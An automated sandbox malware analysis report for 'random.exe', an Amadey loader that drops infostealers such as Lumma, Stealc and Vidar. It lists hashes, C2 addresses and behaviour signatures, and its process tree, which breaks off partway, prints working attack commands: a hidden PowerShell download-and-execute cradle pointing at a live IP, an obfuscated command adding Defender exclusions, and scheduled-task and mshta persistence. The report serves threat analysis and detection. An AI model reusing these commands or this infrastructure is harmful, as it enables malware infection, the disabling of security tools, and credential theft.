Resubmissions

07/03/2025, 19:35

250307-yaszdswky8 10

07/03/2025, 17:54

250307-wg8bjstzcz 10

Analysis

  • max time kernel
    127s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    07/03/2025, 17:54

General

  • Target

    random.exe

  • Size

    1.8MB

  • MD5

    34a1010b4f6cf9c985d71453702602d7

  • SHA1

    266541f9f120e4d4b79ebb5687bbe8a045281b6b

  • SHA256

    ba83807eaf0091c523cc48c99735ae4d690996446a6018aef97f4c07f7529a09

  • SHA512

    fdf1e61e69cb8c63dde682814f2fa0cf400c6ade91e5032eeeba21bf5c1623444bb76e48da312d40a5ad0d38910efbdfd798e8da9090a061a78d77c0f1eca89d

  • SSDEEP

    49152:F8WzsvHzPOk2md5JvUHV7qA3aJuFi8/y:F8gcOZmFsJZ3kCin

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://zfurrycomp.top/api

https://begindecafer.world/api

https://garagedrootz.top/api

https://modelshiverd.icu/api

https://larisechairedd.shop/api

https://catterjur.run/api

https://orangemyther.live/api

https://fostinjec.today/api

https://sterpickced.digital/api

https://dawtastream.bet/api

https://foresctwhispers.top/api

https://tracnquilforest.life/api

https://xcollapimga.fun/api

https://strawpeasaen.fun/api

https://jquietswtreams.life/api

https://starrynsightsky.icu/api

https://earthsymphzony.today/api

https://defaulemot.run/api

https://arisechairedd.shop/api

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Poverty Stealer Payload 6 IoCs
  • Detect Vidar Stealer 1 IoCs
  • Detects Healer an antivirus disabler dropper 2 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Poverty Stealer

    Poverty Stealer is a crypto and infostealer written in C++.

  • Povertystealer family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file 24 IoCs
  • Uses browser remote debugging 2 TTPs 16 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 22 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 23 IoCs
  • Identifies Wine through registry keys 2 TTPs 11 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 55 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 6 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 49 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 11 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 53 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 16 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\random.exe
    "C:\Users\Admin\AppData\Local\Temp\random.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2172
    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2688
      • C:\Users\Admin\AppData\Local\Temp\10126980101\484742576f.exe
        "C:\Users\Admin\AppData\Local\Temp\10126980101\484742576f.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:1548
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c schtasks /create /tn SWz9FmarHrH /tr "mshta C:\Users\Admin\AppData\Local\Temp\aoziCaQVE.hta" /sc minute /mo 25 /ru "Admin" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1316
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn SWz9FmarHrH /tr "mshta C:\Users\Admin\AppData\Local\Temp\aoziCaQVE.hta" /sc minute /mo 25 /ru "Admin" /f
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:1976
        • C:\Windows\SysWOW64\mshta.exe
          mshta C:\Users\Admin\AppData\Local\Temp\aoziCaQVE.hta
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:2444
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'TKKSNBRPY823UPI7SHAFZQAUFLCN1GUA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2792
            • C:\Users\Admin\AppData\Local\TempTKKSNBRPY823UPI7SHAFZQAUFLCN1GUA.EXE
              "C:\Users\Admin\AppData\Local\TempTKKSNBRPY823UPI7SHAFZQAUFLCN1GUA.EXE"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              PID:2660
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\10126990121\am_no.cmd" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2412
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 2
          4⤵
          • System Location Discovery: System Language Discovery
          • Delays execution with timeout.exe
          PID:352
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1944
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1852
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:904
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:912
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1844
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2656
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn "vFcp2maF4Bo" /tr "mshta \"C:\Temp\7hQVsHDKN.hta\"" /sc minute /mo 25 /ru "Admin" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:2300
        • C:\Windows\SysWOW64\mshta.exe
          mshta "C:\Temp\7hQVsHDKN.hta"
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          PID:872
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:332
            • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
              "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              PID:2776
      • C:\Users\Admin\AppData\Local\Temp\10127560101\lk7ybIi.exe
        "C:\Users\Admin\AppData\Local\Temp\10127560101\lk7ybIi.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        PID:2400
        • C:\Users\Admin\AppData\Local\Temp\10127560101\lk7ybIi.exe
          "C:\Users\Admin\AppData\Local\Temp\10127560101\lk7ybIi.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:2756
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2400 -s 504
          4⤵
          • Loads dropped DLL
          • Program crash
          PID:268
      • C:\Users\Admin\AppData\Local\Temp\10127580101\mIrI3a9.exe
        "C:\Users\Admin\AppData\Local\Temp\10127580101\mIrI3a9.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:1316
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2920
      • C:\Users\Admin\AppData\Local\Temp\10127820101\sqVWjvh.exe
        "C:\Users\Admin\AppData\Local\Temp\10127820101\sqVWjvh.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        PID:496
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
          4⤵
          • Uses browser remote debugging
          • Enumerates system info in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:1852
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7249758,0x7fef7249768,0x7fef7249778
            5⤵
              PID:836
            • C:\Windows\system32\ctfmon.exe
              ctfmon.exe
              5⤵
                PID:2312
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1144 --field-trial-handle=1336,i,17291559389611648657,14275795035444281516,131072 /prefetch:2
                5⤵
                  PID:2032
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1416 --field-trial-handle=1336,i,17291559389611648657,14275795035444281516,131072 /prefetch:8
                  5⤵
                    PID:1648
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1560 --field-trial-handle=1336,i,17291559389611648657,14275795035444281516,131072 /prefetch:8
                    5⤵
                      PID:832
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2312 --field-trial-handle=1336,i,17291559389611648657,14275795035444281516,131072 /prefetch:1
                      5⤵
                      • Uses browser remote debugging
                      PID:1148
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2320 --field-trial-handle=1336,i,17291559389611648657,14275795035444281516,131072 /prefetch:1
                      5⤵
                      • Uses browser remote debugging
                      PID:1480
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1572 --field-trial-handle=1336,i,17291559389611648657,14275795035444281516,131072 /prefetch:2
                      5⤵
                        PID:1528
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1128 --field-trial-handle=1336,i,17291559389611648657,14275795035444281516,131072 /prefetch:1
                        5⤵
                        • Uses browser remote debugging
                        PID:1260
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3500 --field-trial-handle=1336,i,17291559389611648657,14275795035444281516,131072 /prefetch:8
                        5⤵
                          PID:888
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3620 --field-trial-handle=1336,i,17291559389611648657,14275795035444281516,131072 /prefetch:8
                          5⤵
                            PID:2964
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3540 --field-trial-handle=1336,i,17291559389611648657,14275795035444281516,131072 /prefetch:8
                            5⤵
                              PID:2000
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\4wtrq" & exit
                            4⤵
                            • System Location Discovery: System Language Discovery
                            PID:904
                            • C:\Windows\SysWOW64\timeout.exe
                              timeout /t 11
                              5⤵
                              • System Location Discovery: System Language Discovery
                              • Delays execution with timeout.exe
                              PID:1552
                        • C:\Users\Admin\AppData\Local\Temp\10127840101\1f63359651.exe
                          "C:\Users\Admin\AppData\Local\Temp\10127840101\1f63359651.exe"
                          3⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • Suspicious use of SetThreadContext
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          PID:1740
                          • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                            "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                            4⤵
                            • Downloads MZ/PE file
                            • Loads dropped DLL
                            • System Location Discovery: System Language Discovery
                            PID:2784
                        • C:\Users\Admin\AppData\Local\Temp\10127850101\7c80f0564f.exe
                          "C:\Users\Admin\AppData\Local\Temp\10127850101\7c80f0564f.exe"
                          3⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • Suspicious use of SetThreadContext
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          PID:1576
                          • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                            "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                            4⤵
                            • Downloads MZ/PE file
                            • Loads dropped DLL
                            • System Location Discovery: System Language Discovery
                            PID:1708
                        • C:\Users\Admin\AppData\Local\Temp\10127860101\0af8120bbc.exe
                          "C:\Users\Admin\AppData\Local\Temp\10127860101\0af8120bbc.exe"
                          3⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Modifies system certificate store
                          • Suspicious behavior: EnumeratesProcesses
                          PID:1356
                        • C:\Users\Admin\AppData\Local\Temp\10127870101\9ba1970019.exe
                          "C:\Users\Admin\AppData\Local\Temp\10127870101\9ba1970019.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of SetThreadContext
                          • System Location Discovery: System Language Discovery
                          PID:912
                          • C:\Users\Admin\AppData\Local\Temp\10127870101\9ba1970019.exe
                            "C:\Users\Admin\AppData\Local\Temp\10127870101\9ba1970019.exe"
                            4⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:2376
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2376 -s 1012
                              5⤵
                              • Loads dropped DLL
                              • Program crash
                              PID:352
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 912 -s 500
                            4⤵
                            • Loads dropped DLL
                            • Program crash
                            PID:2924
                        • C:\Users\Admin\AppData\Local\Temp\10127880101\d875f8b7d2.exe
                          "C:\Users\Admin\AppData\Local\Temp\10127880101\d875f8b7d2.exe"
                          3⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          PID:2908
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 2908 -s 1204
                            4⤵
                            • Loads dropped DLL
                            • Program crash
                            PID:2156
                        • C:\Users\Admin\AppData\Local\Temp\10127890101\899dbfe959.exe
                          "C:\Users\Admin\AppData\Local\Temp\10127890101\899dbfe959.exe"
                          3⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • Suspicious behavior: EnumeratesProcesses
                          PID:1788
                        • C:\Users\Admin\AppData\Local\Temp\10127900101\6107dcdc10.exe
                          "C:\Users\Admin\AppData\Local\Temp\10127900101\6107dcdc10.exe"
                          3⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of SendNotifyMessage
                          PID:1980
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /F /IM firefox.exe /T
                            4⤵
                            • System Location Discovery: System Language Discovery
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1984
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /F /IM chrome.exe /T
                            4⤵
                            • System Location Discovery: System Language Discovery
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:916
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /F /IM msedge.exe /T
                            4⤵
                            • System Location Discovery: System Language Discovery
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1492
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /F /IM opera.exe /T
                            4⤵
                            • System Location Discovery: System Language Discovery
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2860
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /F /IM brave.exe /T
                            4⤵
                            • System Location Discovery: System Language Discovery
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2184
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                            4⤵
                              PID:2268
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                5⤵
                                • Checks processor information in registry
                                • Modifies registry class
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of SendNotifyMessage
                                PID:1728
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1728.0.753943364\1965050490" -parentBuildID 20221007134813 -prefsHandle 1208 -prefMapHandle 1140 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5a9685b2-708f-45d9-a799-643a4b23f66f} 1728 "\\.\pipe\gecko-crash-server-pipe.1728" 1284 106ee158 gpu
                                  6⤵
                                    PID:2896
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1728.1.1903985792\525476844" -parentBuildID 20221007134813 -prefsHandle 1472 -prefMapHandle 1468 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e47c30ae-904f-4915-b5b1-7e3f90ba0593} 1728 "\\.\pipe\gecko-crash-server-pipe.1728" 1484 d71b58 socket
                                    6⤵
                                      PID:1992
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1728.2.2126172450\2094734483" -childID 1 -isForBrowser -prefsHandle 1916 -prefMapHandle 1912 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 800 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cdeaf19d-74ab-4fdd-87db-ed14b3798c21} 1728 "\\.\pipe\gecko-crash-server-pipe.1728" 1928 1065d858 tab
                                      6⤵
                                        PID:1480
                                      • C:\Program Files\Mozilla Firefox\firefox.exe
